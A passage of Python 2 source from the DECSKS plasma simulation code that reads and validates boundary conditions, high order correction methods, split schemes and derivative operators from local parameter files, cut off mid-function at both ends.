BC['f'] = {}\n BC['phi'] = {}\n\n # BC['f'] = BC dict on distribution function f\n\n # BC['f']['x'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['y'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['z'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['vx'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['vy'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['vz'] = {'lower' : lower_value, 'upper' : upper_value}\n\n # BC['phi'] = BC dict on electric potential phi\n\n # BC['phi']['x'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['y'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['z'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['vx'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['vy'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['vz'] = {'lower' : lower_value, 'upper' : upper_value}\n #\n # subdict objects that give keyword descriptions that match method names in lib.boundaryconditions and lib.fieldsolvers\n # include, for var in phasespace_vars:\n #\n # BC['f'][var]['type'] and BC['phi'][var]['type']\n #\n # these are used to assemble function handle strings that select the corresponding routine needed for the specified BCs\n\n\n BC_infilename = './etc/' + lines[106][lines[106].find(':')+1:].strip()\n BC_infile = open(BC_infilename, 'r')\n BC_infile_lines = BC_infile.readlines()\n\n # DECSKS will throw an error if numbers are inputted as BCs in etc/params.dat\n\n # strings are stored as lowercase as they are used in an eval statement to access\n # the relevant method in lib.boundaryconditions. e.g. 
'absorbing' is accessed as\n # either eval('lib.boundaryconditions.absorbing_lower_boundary') or\n # eval('lib.boundaryconditions.absorbing_upper_boundary') in lib.convect.remap_step\n\n BC['f']['x'] = {}\n BC['f']['x']['lower'] = safe_eval(BC_infile_lines[40][BC_infile_lines[40].find('=')+1:].strip())\n BC['f']['x']['upper'] = safe_eval(BC_infile_lines[41][BC_infile_lines[41].find('=')+1:].strip())\n\n BC['f']['y'] = {}\n BC['f']['y']['lower'] = safe_eval(BC_infile_lines[43][BC_infile_lines[43].find('=')+1:].strip())\n BC['f']['y']['upper'] = safe_eval(BC_infile_lines[44][BC_infile_lines[44].find('=')+1:].strip())\n\n BC['f']['z'] = {}\n BC['f']['z']['lower'] = safe_eval(BC_infile_lines[46][BC_infile_lines[46].find('=')+1:].strip())\n BC['f']['z']['upper'] = safe_eval(BC_infile_lines[47][BC_infile_lines[47].find('=')+1:].strip())\n\n BC['f']['vx'] = {}\n BC['f']['vx']['lower'] = safe_eval(BC_infile_lines[55][BC_infile_lines[55].find('=')+1:].strip())\n BC['f']['vx']['upper'] = safe_eval(BC_infile_lines[56][BC_infile_lines[56].find('=')+1:].strip())\n\n BC['f']['vy'] = {}\n BC['f']['vy']['lower'] = safe_eval(BC_infile_lines[58][BC_infile_lines[58].find('=')+1:].strip())\n BC['f']['vy']['upper'] = safe_eval(BC_infile_lines[59][BC_infile_lines[59].find('=')+1:].strip())\n\n BC['f']['vz'] = {}\n BC['f']['vz']['lower'] = safe_eval(BC_infile_lines[61][BC_infile_lines[61].find('=')+1:].strip())\n BC['f']['vz']['upper'] = safe_eval(BC_infile_lines[62][BC_infile_lines[62].find('=')+1:].strip())\n\n # make all BCs lowercase strings so they can be used to construct the function strings in lib.boundaryconditions module\n # whose names are all lowercase\n\n # if an accepted boundary condition synonym as been used, change value to the name it goes by in lib.boundaryconditions\n # check that all inputs for evolved phase space variables are recognized keywords and are compatible with the\n # boundary at which they are indicated\n for var in phasespace_vars:\n for boundary in ['lower', 'upper']:\n BC['f'][var][boundary] = BC['f'][var][boundary].lower()\n if BC['f'][var][boundary] == 'open' or BC['f'][var][boundary] == 'cutoff':\n print \"\\nCourtesy notice to user: the boundary condition %s was selected for the distribution function on %s at the %s boundary in params_boundaryconditions.dat; \" % (BC['f'][var][boundary].upper(), var, boundary)\n print \"this is a recognized input synonym for a '%s' condition. Changing value stored to BC['f']['%s']['%s'] = '%s'\\n\" % ('ABSORBING', var, boundary, 'ABSORBING')\n print \"Please regard any warnings/error messages that cite the keyword '%s' with this change in mind\\n\" % ('ABSORBING')\n BC['f'][var][boundary] = 'absorbing'\n\n elif BC['f'][var][boundary] == 'collector':\n pass\n\n elif BC['f'][var][boundary] == 'absorbing':\n pass\n\n elif BC['f'][var][boundary] == 'symmetry':\n if boundary == 'upper':\n raise NotImplementedError('a symmetric UPPER boundary condition on the distribution function was specified in params_boundaryconditions.dat; however, DECSKS only has functionality to permit lower boundary symmetry.')\n elif boundary == 'lower':\n print \"\\nCourtesy notice to user: the boundary condition %s was selected for the distribution function on %s at the %s boundary in params_boundaryconditions.dat; \" % (BC['f'][var][boundary].upper(), var, boundary)\n print \"this is a recognized input synonym for a '%s' condition. 
Changing value stored to BC['f']['%s']['%s'] = '%s'\\n\" % ('SYMMETRIC', var, boundary, 'SYMMETRIC')\n print \"Please regard any warnings/error messages that cite the keyword '%s' with this change in mind\\n\" % ('SYMMETRIC')\n BC['f'][var][boundary] = 'symmetric'\n\n elif BC['f'][var][boundary] == 'symmetric':\n if boundary == 'lower':\n pass\n elif boundary == 'upper':\n raise NotImplementedError('a symmetric UPPER boundary condition on the distribution function was specified in params_boundaryconditions.dat; however, DECSKS only has functionality to permit lower boundary symmetry.')\n\n elif BC['f'][var][boundary] == 'periodic':\n pass\n\n else: # inputs do not match any options\n print '\\nThe invalid keyword %s was specified in params_boundaryconditions.dat on the variable %s at the %s boundary\\n' % (BC['f'][var][boundary].upper(), var, boundary)\n raise InputError('inputs are restricted to those listed as options in params_boundaryconditions.dat')\n\n # above we have checked for valid input. Next, check for compatible inputs (if 'periodic' is selected, it must be selected for both\n # upper and lower bounds) and store a descriptor that toggles the correct orchestrator\n # function in lib.boundaryconditions module ('periodic' vs. 'nonperiodic')\n for var in phasespace_vars:\n if BC['f'][var]['lower'] == 'periodic' and BC['f'][var]['upper'] == 'periodic':\n BC['f'][var]['type'] = 'periodic'\n\n elif BC['f'][var]['lower'] == 'symmetric' and BC['f'][var]['upper'] != 'periodic':\n BC['f'][var]['type'] = 'nonperiodic'\n \n # check for invalid inputs\n elif BC['f'][var]['lower'] == 'symmetric' and BC['f'][var]['upper'] == 'periodic':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat:\"\n print \"\\nlower boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['upper'].upper())\n\n print \"\\nare inconsistent. Cannot combine a symmetric lower boundary with a periodic upper boundary condition. Periodic boundary conditions involve both boundaries (both boundaries would have to be set to PERIODIC)\\n\"\n\n raise InputError('cannot combine a symmetric lower boundary condition with a periodic upper boundary condition for the distribution function. Check inputs in boundaryconditions.dat and change the upper bound to be of non-periodic type')\n\n elif BC['f'][var]['lower'] == 'periodic' and BC['f'][var]['upper'] != 'periodic':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat:\"\n print \"\\nlower boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['upper'].upper())\n\n print \"\\nare inconsistent. 
Cannot combine periodic and non-periodic boundary conditions on same variable for distribution function, check inputs in params_boundaryconditions.dat')\"\n\n raise InputError('cannot combine periodic and non-periodic boundary conditions on same variable for distribution function, check inputs in params_boundaryconditions.dat')\n elif BC['f'][var]['lower'] != 'periodic' and BC['f'][var]['upper'] == 'periodic':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat:\"\n print \"\\nlower boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['upper'].upper())\n\n print \"\\nare inconsistent. Cannot combine periodic and non-periodic boundary conditions on same variable for distribution function, check inputs in params_boundaryconditions.dat')\"\n\n raise InputError('cannot combine periodic and non-periodic boundary conditions on same variable for distribution function, check inputs in params_boundaryconditions.dat')\n else: # boundary conditions are combination of only: symmetric (lower), collector (lower or upper), absorbing (lower or upper)\n BC['f'][var]['type'] = 'nonperiodic'\n\n distribution_function_boundarycondition_orchestrator_prefix = 'DECSKS.lib.boundaryconditions'\n\n # create a dictionary of function handles that call either\n # the 'periodic', 'nonperiodic', or 'symmetric' orchestrator in lib.boundaryconditions\n #\n # i.e. we form the string handle for each active variable var:\n #\n # distribution_function_boundarycondition_orchestrator_handle[var] =\n #\n # DECSKS.lib.boundaryconditions.periodic\n # DECSKS.lib.boundaryconditions.nonperiodic\n # DECSKS.lib.boundaryconditions.symmetric\n\n distribution_function_boundarycondition_orchestrator_handle = {}\n\n for var in phasespace_vars:\n distribution_function_boundarycondition_orchestrator_handle[var] = \".\".join(\n (distribution_function_boundarycondition_orchestrator_prefix, BC['f'][var]['type']))\n\n # --------------------------------------------------------------------------\n # Store number of active gridpoints for every phase space variable\n #\n # Note: for periodic BCs: Nz_active = Nz - 1, we evolve Nz_active nodes and assign by periodicity the f[Nz-1] = f[0]\n # for all other BCs: Nz_active = Nz\n\n # active_dims vs. 
total_dims\n # note a generalized loop cannot be used as assignments cannot be made under an assembled string with eval\n if BC['f']['x']['lower'] == 'periodic' and BC['f']['x']['upper'] == 'periodic' and Nx is not None:\n Nx_active = Nx - 1\n else:\n Nx_active = Nx\n\n if BC['f']['y']['lower'] == 'periodic' and BC['f']['y']['upper'] == 'periodic' and Ny is not None:\n Ny_active = Ny - 1\n else:\n Ny_active = Ny\n\n if BC['f']['z']['lower'] == 'periodic' and BC['f']['z']['upper'] == 'periodic' and Nz is not None:\n Nz_active = Nz - 1\n else:\n Nz_active = Nz\n\n if BC['f']['vx']['lower'] == 'periodic' and BC['f']['vx']['upper'] == 'periodic' and Nvx is not None:\n Nvx_active = Nvx - 1\n else:\n Nvx_active = Nvx\n\n if BC['f']['vy']['lower'] == 'periodic' and BC['f']['vy']['upper'] == 'periodic' and Nvy is not None:\n Nvy_active = Nvy - 1\n else:\n Nvy_active = Nvy\n\n if BC['f']['vz']['lower'] == 'periodic' and BC['f']['vz']['upper'] == 'periodic' and Nvz is not None:\n Nvz_active = Nvz - 1\n else:\n Nvz_active = Nvz\n\n # --------------------------------------------------------------------------\n # High order correction (HOC) method applied to each phase space variable\n\n # store as uppercase\n\n HOC = {}\n HOC['x'] = safe_eval(lines[56][lines[56].find(':')+1:].strip())\n HOC['y'] = safe_eval(lines[57][lines[57].find(':')+1:].strip())\n HOC['z'] = safe_eval(lines[58][lines[58].find(':')+1:].strip())\n\n HOC['vx'] = safe_eval(lines[60][lines[60].find(':')+1:].strip())\n HOC['vy'] = safe_eval(lines[61][lines[61].find(':')+1:].strip())\n HOC['vz'] = safe_eval(lines[62][lines[62].find(':')+1:].strip())\n\n # make all non-None inputs capitalized\n for key in HOC.keys():\n if HOC[key] is not None:\n HOC[key] = HOC[key].upper()\n else:\n pass\n\n # check for valid inputs\n for key in HOC.keys():\n if HOC[key] is not None:\n if type(HOC[key]) != str:\n raise InputError('A non-string entry was found as a high order correction specification. Only FD or FOURIER are accepted')\n elif HOC[key] != 'FD' and HOC[key] != 'FOURIER':\n print \"\\nThe following high order correction was specified in params.dat, but is not recognized:\"\n print \"\\nHigh order correction on %s: %s\\n\" % (key, HOC[key].upper())\n print \"only FD and FOURIER are accepted keywords\\n\"\n raise InputError('An unrecognized high order correction was specified. Only FD or FOURIER are accepted')\n\n elif HOC[key] == 'FOURIER' and BC['f'][key]['type'] != 'periodic': # Fourier corrections use trigonometric derivatives, which rely on periodicity of the underlying functions\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat:\"\n print \"\\nlower boundary condition on f for the variable %s: %s\" % (key, BC['f'][key]['lower'].upper())\n print \"upper boundary condition on f fore the variable %s: %s\\n\\n\" % (key, BC['f'][key]['upper'].upper())\n\n print \"are inconsistent with the high order correction specified in params.dat:\"\n print \"\\nhigh order correction on %s: %s\\n\\n\" % (key, HOC[var].upper())\n\n print \"FOURIER high order corrections only make sense for periodic systems (if this is the intention, the BCs on f and phi must be set to PERIODIC in params_boundaryconditions.dat)\\n\"\n\n raise InputError('Fourier corrections on a variable only make sense for periodic systems. 
The boundary conditions on the distribution function were read-in as not periodic for this variable.')\n elif eval('N' + key) is None:\n raise InputError('a variable not involved in the simulation (its number of grid points was specified as None) must also have its high order correction method specified as None. While reading in the input deck, the aforementioned expectation was not met. Please revisit the entries (number of grid points) and high order correction specification.')\n\n # store lists containing number of total and active gridpoints\n # this is acknowledged as redundant given the above storing as Nx_active, Ny_active,\n # etc., but these objects are used in legacy methods inside DECSKS\n\n # initialize lists\n total_dims = [] # e.g. in 1D1V this could contain [Nx, Nvx]\n active_dims = [] # e.g. in 1D1V this could contain [Nx_active, Nvx_active]\n\n for var in phasespace_vars:\n total_dims.append(eval('N' + var))\n active_dims.append(eval('N' + var + '_active'))\n\n numdims = len(phasespace_vars)\n # --------------------------------------------------------------------------\n # Initial density specification (2 species)\n\n mu = safe_eval(lines[68][lines[68].find(':')+1:].strip())\n\n densities_list = lines[69][lines[69].find(':')+1:].strip().split(', ')\n for i in range(len(densities_list)):\n densities_list[i] = densities_list[i].lower()\n\n if len(densities_list) == 2: # if two species return dictionary of strings\n density = {}\n density['electrons'] = densities_list[0]\n density['electrons'] = density['electrons'].lower()\n density['ions'] = densities_list[1]\n density['ions'] = density['ions'].lower()\n print \"\\ntwo species simulation with initial densities:\\n\"\n print \"electrons: %s\" % density['electrons']\n print \"ions: %s\\n\" % density['ions']\n\n # --------------------------------------------------------------------------\n # split scheme specification\n\n split_scheme = lines[81][lines[81].find('=')+1:].strip()\n split_scheme = split_scheme.upper()\n print \"split scheme: %s\\n\" % split_scheme\n\n # filepath to splitting coefficient tables\n filename = lines[82][lines[82].find(':')+1:].strip()\n filepath = './etc/' + filename\n\n # get splitting coefficients for chosen scheme\n if split_scheme is not None:\n splitting = splitting_coefficients(filepath, split_scheme)\n else:\n splitting = None\n\n\n\n # --------------------------------------------------------------------------\n # check for validity on split scheme vs. boundary conditions\n #\n # i.e. 
check that if the problem is bounded, the user cannot use a split scheme that has negative time substeps\n #\n # Schemes with only positive time substeps: LF2\n # Schemes that contain negative time substeps: Y4, O6-4, O11-6, O14-6\n #\n\n for var in phasespace_vars:\n if BC['f'][var]['lower'] != 'periodic' and BC['f'][var]['upper'] != 'periodic':\n if split_scheme in ['LF2']:\n pass\n else: # a split scheme that involves negative time substeps has been selected\n print \"\\nThe following set of user specified information is not accepted by DECSKS:\\n\"\n print \"\\nin params.dat, the following was specified:\"\n print \"split scheme = %s:\" % split_scheme\n print \"\\nand the boundary data was specified in params_boundaryconditions.dat:\\n\"\n print \"distribution function lower boundary condition on %s: %s\" % (BC['f'][var]['lower'],var)\n print \"distribution function upper boundary condition on %s: %s\" % (BC['f'][var]['upper'], var)\n print \"\\nThe split scheme involves negative time substeps, while the boundary conditions are non-periodic. The BOUNDED Vlasov-Poisson problem is irreversible. A split scheme with negative time substeps can only be used in periodic systems, which correspond to systems of infinite extent\\n\"\n raise InputError('The split scheme involves negative time substeps, while the boundary conditions are non-periodic. The BOUNDED Vlasov-Poisson problem is irreversible. A split scheme with negative time substeps can only be used in periodic systems, which correspond to systems of infinite extent. To rectify this, the user may wish to select periodic boundary conditions on the distribution function (hence phi).')\n\n # --------------------------------------------------------------------------\n # Plot window specification (used in lib.plots.Setup)\n\n xmin = eval(lines[96][lines[96].find('=')+1:].strip())\n xmax = eval(lines[97][lines[97].find('=')+1:].strip())\n ymin = eval(lines[99][lines[99].find('=')+1:].strip())\n ymax = eval(lines[100][lines[100].find('=')+1:].strip())\n\n plot_params = dict(xmin = xmin, xmax = xmax,\n ymin = ymin, ymax = ymax)\n\n record_outputs = lines[103][lines[103].find(':')+1:].strip()\n record_outputs = record_outputs.lower()\n\n if record_outputs == 'yes':\n # output filepath setup\n filename = lines[104][lines[104].find(':')+1:].strip()\n filepath = './etc/' + filename\n outfiles = output_files(filepath) # dictionary of opened files\n else:\n outfiles = None\n\n # --------------------------------------------------------------------------\n # DICTIONARIES AND MATRICES RELEVANT FOR HIGH ORDER CORRECTION APPLICATIONS\n #\n\n # Constructing the finite different weight matrices, W.\n #-------------------------------------------------------\n # requires: (dict) FD_schemes\n #\n # Note: FD_schemes is only needed to construct W. W is what is used in\n # the simulation. Hence, the building routine for FD_schemes\n # is not optimized, since it happens before the simulation starts\n # and is not a source of repeated computational cost.\n #\n # FD_schemes is a dictionary containing the families of every order derivative\n # needed for the indicated global error N in etc/params.dat, i.e. all schemes\n # of various degrees of asymmetry and handedness. For large N, this can be a\n # large dictionary, cf. the function routine read_FD_schemes to see all\n # that gets stored inside. It is used to construct the difference coefficient\n # matrices W (for applying high order corrections). 
The other scheme\n # FD_scheme_dn1 is used to construct the matrix W_dn1 which is a difference\n # coefficient matrix for the first derivative (dn = 1) at LTE = 6, and used\n # to compute the electric field E = \"-dphi\" = W_dn1.dot(phi),\n # where dphi is the first derivative# of the electric potential, as calculated by\n # the methods in lib.fieldsolvers package\n #---------------------------------------------------------------------------\n #\n # initialize all dictionaries whose keys correspond to phase space vars\n # and whose values contain the relevant ndarrays\n\n Xi = {}\n xi = {}\n W = {}\n\n # top level check: if any var has FD corrections, store FD_schemes and init FD weight matrix W\n # for 6th order first derivative\n if 'FD' in HOC.values():\n # store finite difference schemes\n FD_schemes = read_FD_schemes(N)\n\n # if FD on a configuration variable, need to differentiate phi to obtain the acceleration a ~ E = -dphi\n if HOC['x'] == 'FD' or HOC['y'] == 'FD' or HOC['z'] == 'FD':\n # first derivative with LTE = 6, used to find dphi = -E after phi is\n # found from a 6th order Poisson solve\n FD_scheme_dn1 = read_FD_scheme(1,6)\n W_dn1_LTE6 = assemble_finite_difference_weight_matrix_const_dn_const_LTE(Nx_active,\n FD_scheme_dn1,\n dn = 1,\n LTE = 6\n )\n\n else:\n # else, Fourier Gauss solver is used, no need for this matrix\n W_dn1_LTE6 = None\n\n # variable-by-variable checks: assemble consistent objects needed\n # for the specified means of HOC from etc/params.dat\n\n # Note: the following is organized with the expectation that\n # higher dimensional implementations would be stepped through\n # as sets of 2D advection problems, always paired as z and vz\n # i.e. not as mixed stepthroughs with x paired with vy for example\n\n for var in phasespace_vars:\n if HOC[var] == 'FD':\n W[var] = assemble_finite_difference_weight_matrix(\n eval('N' + var + '_active'),\n N,\n FD_schemes\n )\n elif HOC[var] == 'FOURIER':\n # ensure the correct number of grid points\n # is passed for the generalized velocity Nvz_active\n # for x,y,z, 'vz' = vx, vy, vz\n # for vx, vy, vz, 'vz' = ax, ay, az, which have\n # the same number of dims as x, y, z, respectively\n # this is needed in the routine assemble_spectral_derivative_operator\n # so that the correctly dimensioned 2D arrays are returned\n\n if var[0] == 'v':\n # if a velocity variable, the velocity of this velocity is an acceleration\n # which has the same dimensions as the corresponding configuration variable\n # e.g. vx has velocity(vx) = ax which has the same dimensions as x\n Nvz_active = eval('N' + var[1] + '_active')\n else:\n # if a configuration variable, the velocity is the physical velocity, which\n # must be a coresponding active variable\n # e.g. 
x has a velocity vx\n Nvz_active = eval('Nv' + var + '_active')\n\n\n # The 3D tensor Xi is used to compute trigonometric derivatives\n # by operating on a 2D array of Fourier wave components (transformed\n # row-wise for each column, where as usual the objects have been\n # transpoed if needed so that the variation (x or vx) is along\n # rows, not columns)\n #\n # Fourier transform (derivatives) = Xi * Fourier transform (f)\n # derivatives = inverse transform (Xi * Fourier(f))\n #\n #\n # the object xi is used in legacy methods in DECSKS (pre-DECSKSv2.0)\n\n Xi, xi = assemble_spectral_derivative_operator(Xi, xi,\n var,\n eval('a' + var),\n eval('b' + var),\n eval('N' + var),\n eval('N' + var + '_active'),\n Nvz_active,\n N)\n\n # ---------------------------------------------------------------------\n # \"Alternating\" identity matrix\n\n # in lib.HOC.correctors, require an diagonal matrix with shape = (Nz_active, Nz_active)\n # with entries as (-1)^i, where i is the row number, for details see on github\n #\n # dsirajud/IPython-notebooks/\n # DECSKS-09 -- array-based implementation recast -- part 1.ipynb\n #\n # section \"2D casting of correction coefficients c (vector) -> c (tensor)\"\n\n I_alternating = np.diag( (-np.ones(N)) ** np.arange(N) )\n\n # ---------------------------------------------------------------------\n # Bernoulli number storage, and forming the matrices A_pos, A_neg\n\n # obtain Bernoulli numbers (note: only 23 numbers are entered into the dat file ->\n # max global error is 23 - 1 = 22) for a correction up to global error order\n # N, N-1 Bernoulli numbers are needed. If higher than global error order 22 is\n # desired, additional Bernoulli numbes need to be entered in\n #\n # etc/Table_of_Bernoulli_numbers.dat\n #\n\n # Store Bernoulli numbers from dat file etc/Table_of_Bernoulli_numbers.dat\n filename = 'Table_of_Bernoulli_numbers.dat'\n filepath = './etc/' + filename\n Bernoulli_numbers = Bernoulli(filepath)\n\n # \"A\" matrices for Bernoulli number storage and matrix HOC application\n # in lib.HOC.Beta_matrix, see notebook on github at\n # dsirajud/IPython-notebooks/\n # DECSKS-09 -- array-based implementation recast -- part 1.ipynb\n #\n # the A matrices are matrices containing scaled Bernoulli numbers (normalized by factorials)\n # that also factor in the sign (direction) information of the advecting density packets\n # (the different amounts to all odd coefficients having opposite sign)\n\n # The A matrices are used in the method lib.HOC.Beta_matrix (used to construct the array of the *magnitudes*\n # of the Nvz sets of N beta coefficients; note that the high order flux is further computed as a sum of\n # products that alternating with sign according to the parity of the derivative number, i.e. alternates signs\n # among odds and evens. 
These prefactors are applied at the end of the method lib.HOC.correctors by matrix\n # pre-multiplication of the matrix B with the alternating (in sight) identity matrix I formed above)\n\n # the method lib.HOC.Beta_matrix is called from inside lib.HOC.correctors (used to assemble the 2D array c of correctors)\n\n A_pos, A_neg = np.zeros([N,N]), np.zeros([N,N])\n for i in range(N):\n for j in range(i+1):\n A_pos[i,j] = Bernoulli_numbers[i-j] / scipy.misc.factorial(i-j)\n if (i - j) == 1:\n A_neg[i,j] = -A_pos[i,j]\n else:\n A_neg[i,j] = A_pos[i,j]\n\n A_matrix = {}\n # dictionary container\n # allow dictionary access to relevant matrix of Bernoulli numbers\n # by operating with str(int(np.sign(CFL.frac)))\n\n A_matrix['1'] = A_pos\n A_matrix['0'] = A_pos\n A_matrix['-1'] = A_neg\n\n #--------------------------------------------------------------------------------------------#\n # ELECTRIC POTENTIAL PHI\n #--------------------------------------------------------------------------------------------#\n\n #--------------------------------------------------------------------------------------------#\n # Boundary conditions BC['phi'] dictionary and dictionary of boundary values, phi_BC\n #\n # BC['phi']['x', 'y', or 'z']['lower' or 'upper'] = string keyword that describes the BC\n # phi_BC['x', 'y', or 'z'] = boundary value vector phi_BC that appears in a Poisson solver\n #--------------------------------------------------------------------------------------------#\n\n phi_BC = {}\n # keys: 'x', 'y', 'z'\n # values: ndarrays of size eval('N' + var + '_active)\n\n BC['phi'] = {}\n # keys: 'x', 'y', 'z'\n # values / keys for subdict: 'lower', 'upper'\n # values for subdict: string keyword that describes the BC at the key specification\n\n # --------------------------------------------------------------------------\n # PHI BOUNDARY CONDITIONS AND PHI BOUNDARY VALUES VECTORS FOR SOLVER Phi_BC['x', 'y', or 'z']\n\n # lines read in from boundaryconditions dat file were stored above in BC_infile_lines\n if HOC['x'] == 'FD':\n BC['phi']['x'] = {}\n BC['phi']['x']['lower'] = safe_eval(BC_infile_lines[196][BC_infile_lines[196].find('=')+1:].strip())\n BC['phi']['x']['upper'] = safe_eval(BC_infile_lines[197][BC_infile_lines[197].find('=')+1:].strip())\n phi_BC['x'] = np.zeros(Nx_active)\n elif HOC['x'] == 'FOURIER': # periodic fourier solver is used, a BC vector is not needed\n phi_BC['x'] = None\n\n if HOC['y'] == 'FD':\n BC['phi']['y'] = {}\n BC['phi']['y']['lower'] = safe_eval(BC_infile_lines[199][BC_infile_lines[199].find('=')+1:].strip())\n BC['phi']['y']['upper'] = safe_eval(BC_infile_lines[200][BC_infile_lines[200].find('=')+1:].strip())\n phi_BC['y'] = np.zeros(Ny_active)\n elif HOC['y'] == 'FOURIER': # periodic fourier solver is used, a BC vector is not needed\n phi_BC['y'] = None\n\n if HOC['z'] == 'FD':\n BC['phi']['z'] = {}\n BC['phi']['z']['lower'] = safe_eval(BC_infile_lines[202][BC_infile_lines[202].find('=')+1:].strip())\n BC['phi']['z']['upper'] = safe_eval(BC_infile_lines[203][BC_infile_lines[203].find('=')+1:].strip())\n phi_BC['z'] = np.zeros(Nz_active)\n elif HOC['z'] == 'FOURIER': # periodic fourier solver is used, a BC vector is not needed\n phi_BC['z'] = None\n\n # ensure all inputs stored above in BC['phi'] dict objects are uppercase and recognized\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n if HOC[var] == 'FOURIER':\n pass\n else: # HOC is FD which computes the Lorentz term through a potential phi (Fourier uses the electric field E)\n\n # LOWER BOUNDARY CHECKS\n 
if BC['phi'][var]['lower'] is None:\n raise InputError('a NoneType was specified as a LOWER boundary condition on the electric potential phi for an active variable (a non-NoneType was specified for the number of grid points on this variable). If the variable is not meant to be evolved, set its number of grid points to None')\n\n elif type(BC['phi'][var]['lower']) != str:\n raise InputError('a non-string type as a LOWER boundary condition on the electric potential phi for an active variable (a non-NoneType was specified for the number of grid points on this variable). If the variable is not intended to be active, set its number of grid points to None. Otherwise, a recognized string keyword must be specified on the boundary condition on phi for this variable.')\n\n else:\n BC['phi'][var]['lower'] = BC['phi'][var]['lower'].upper()\n\n if BC['phi'][var]['lower'] not in ['PERIODIC', 'SELF-CONSISTENT', 'SYMMETRIC', 'SYMMETRY', 'BIAS']:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat is not a recognized keyword:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n\n raise InputError('boundary condition indicated on phi is not an accepted keyword option')\n\n elif (BC['phi'][var]['lower'] == 'SYMMETRIC' or BC['phi'][var]['lower'] == 'SYMMETRY') and BC['f'][var]['lower'] != 'symmetric':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat is:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['lower'].upper())\n print \"lower boundary condition on f for variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on f for variable %s: %s\\n\" % (var, BC['f'][var]['upper'].upper())\n\n print \"a SYMMETRIC boundary condition must be specified on both phi and f\"\n # by this point all synonyms have been normalized on BC['f'][var], 'symmetric' corresponds to the symmetry condition\n raise InputError('a SYMMETRY boundary condition on phi was specified, but a symmetry boundary was not specified on the distribution function f at this same (lower) boundary. A symmetric domain requires a lower boundary condition to be SYMMETRIC on both phi and f.')\n\n else:\n pass\n\n # UPPER BOUNDARY CHECKS\n if BC['phi'][var]['upper'] is None:\n raise InputError('a NoneType was specified as an upper boundary condition on the electric potential phi for an active variable (a non-NoneType was specified for the number of grid points on this variable). If the variable is not meant to be evolved, set its number of grid points to None')\n\n elif type(BC['phi'][var]['upper']) != str:\n raise InputError('a non-string type as an upper boundary condition on the electric potential phi for an active variable (a non-NoneType was specified for the number of grid points on this variable). If the variable is not intended to be active, set its number of grid points to None. 
Otherwise, a recognized string keyword must be specified on the boundary condition on phi for this variable.')\n\n else:\n BC['phi'][var]['upper'] = BC['phi'][var]['upper'].upper()\n\n if BC['phi'][var]['upper'] not in ['PERIODIC', 'SELF-CONSISTENT', 'SYMMETRIC', 'SYMMETRY', 'BIAS']:\n print \"\\nThe following boundary condition specified in params_boundaryconditions.dat is not a recognized boundary condition keyword:\\n\\n\"\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['upper'].upper())\n\n raise InputError('boundary condition indicated on phi is not an accepted keyword option')\n\n elif BC['phi'][var]['upper'] == 'SYMMETRIC' or BC['phi'][var]['upper'] == 'SYMMETRY':\n print \"\\nThe following boundary condition specified in params_boundaryconditions.dat is not available:\\n\\n\"\n print \"upper boundary condition on phi: %s\\n\" % BC['phi'][var]['upper'].upper()\n\n raise NotImplementedError('a SYMMETRY boundary condition on phi as an UPPER boundary is specified in params_boundaryconditions.dat; only lower boundaries can support a symmetry boundary condition.')\n\n\n # CHECK FOR CONSISTENCY IN BOUNDARY CONDITIONS BETWEEN BOTH LOWER AND UPPER SPECIFICATIONS\n if BC['phi'][var]['lower'] == 'PERIODIC' and BC['phi'][var]['upper'] != 'PERIODIC':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\\n\" % (var, BC['phi'][var]['upper'].upper())\n\n raise InputError('PERIODIC boundary conditions on phi involve both lower and upper boundaries. The read-in of params_boundaryconditions.dat has the lower boundary condition as PERIODIC but the upper boundary condition is NOT. Both boundary conditions on phi must be set to PERIODIC if a periodic plasma is to be simulated.')\n\n elif BC['phi'][var]['lower'] != 'PERIODIC' and BC['phi'][var]['upper'] == 'PERIODIC':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\\n\" % (var, BC['phi'][var]['upper'].upper())\n\n raise InputError('PERIODIC boundary conditions on phi involve both lower and upper boundaries. The read-in of params_boundaryconditions.dat has the upper boundary condition as PERIODIC but the lower boundary condition is NOT. Both boundary conditions on phi must be set to PERIODIC if a periodic plasma is to be simulated.')\n\n elif BC['phi'][var]['lower'] == 'PERIODIC' and BC['phi'][var]['upper'] == 'PERIODIC':\n\n if BC['f'][var]['type'] != 'periodic': # note that validity and consistency checks on inputs for the distribution function have already been done above\n print \"\\nThe following boundary conditions 